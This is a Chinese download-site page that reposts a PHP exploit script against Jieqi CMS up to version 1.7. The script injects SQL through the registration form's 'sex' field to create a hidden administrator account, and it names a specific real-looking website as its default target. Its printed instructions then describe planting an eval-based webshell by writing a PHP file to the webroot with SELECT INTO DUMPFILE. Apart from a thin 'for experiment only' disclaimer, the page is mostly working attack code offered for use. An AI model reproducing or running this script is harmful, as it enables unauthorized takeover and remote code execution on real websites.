使用此脚本会直接在目标网站的数据库中插入一个新的管理员,
username = b1u3b0y
password = lanhai本代码仅为实验用途,请勿用于非法用途。
另:杰奇1.7官方版已经修复此漏洞。
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
$argv = array("","www.slzww.com","80","http://www.slzww.com/");
function http_send($host, $packet, $port){
$sock = fsockopen($host, $port);
while (!$sock){
print "\n[-] No response from {$host}:$port Trying again...";
$sock = fsockopen($host, $port);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
print $resp;
return $resp;
}
print_r('
+---------------------------------------------------------------------------+
| Jieqi CMS Add Manager [version <=1.7] |
+---------------------------------------------------------------------------+
+---------------------------------------------------------------------------+
');
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$payload = "username=woainimeimei&password=imnothack&repassword=imnothack&email=woainimeimei@163.COM&sex=9,'woainimeimei@163.COM','',0,0,'','','','','','','','',1332592733,0,0,0,1,0,0,0,0,10,10,0,0,0,0,0,0,0,0),(0, 0, 'niaiwome', 'niaiwome', '2eb429c676681a7bf5ae8702aa768363', 2, 1332592733, 'H', 9, 'justjsp@163.com', '', 0, 0, '', '', '', '', '', '', '', '', 1332592733, 0, 0, 0, 1, 0, 0, 0, 0, 10, 10, 0, 0, 0,0, 0, 0, 0, 0)#&qq=&url=&action=newuser&submit=%CC%E1+%BD%BB\r\n";
$packet = "POST {$path}register.php?do=submit HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Cookie: jieqiVisitInfo=jieqiUserLogin%3D1332488363%2CjieqiUserId%3D1; PHPSESSID=ho4u03ebnlq6cl6vlg1t2kbjg2";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
http_send($host, $packet, $port);
print_r('
+---------------------------------------------------------------------------+
[+] Add manager successful? Please check it yourself!
[ ] Default URL: http://localhost/admin
[ ] username = b1u3b0y
[ ] password = lanhai
+---------------------------------------------------------------------------+
[+] Get Webshell (mysql用户需要file_priv权限)
[ ] [系统工具] -> [系统信息] (Get Path)
[ ] [数据维护] -> [数据库升级]
[ ] 执行 [ select concat(char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62)) into dumpfile \'C:\\\\wwwroot\\\\1.php\' ]
[ ] http://localhost/1.php (password:cmd)
+---------------------------------------------------------------------------+
');
?>无错源码所有资源来自会员发布以及互联网收集,不代表本站立场,如有侵犯你的权益请联系管理员,站内发信联系 我们会第一时间进行审核删除。站内资源为网友个人学习或测试研究使用,未经原版权作者许可,禁止用于任何商业途径!本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。请在下载24小时内删除!
如果遇到付费才可观看的文章,建议升级传奇VIP。全站所有资源“任意下免费看”。本站资源少部分采用7z压缩,为防止有人压缩软件不支持7z格式,7z解压,建议下载7-zip,zip、rar解压,建议下载WinRAR。如遇解压需要密码,请尝试使用www.wucuoym.com来解压,如若仍有问题,请联系站长。
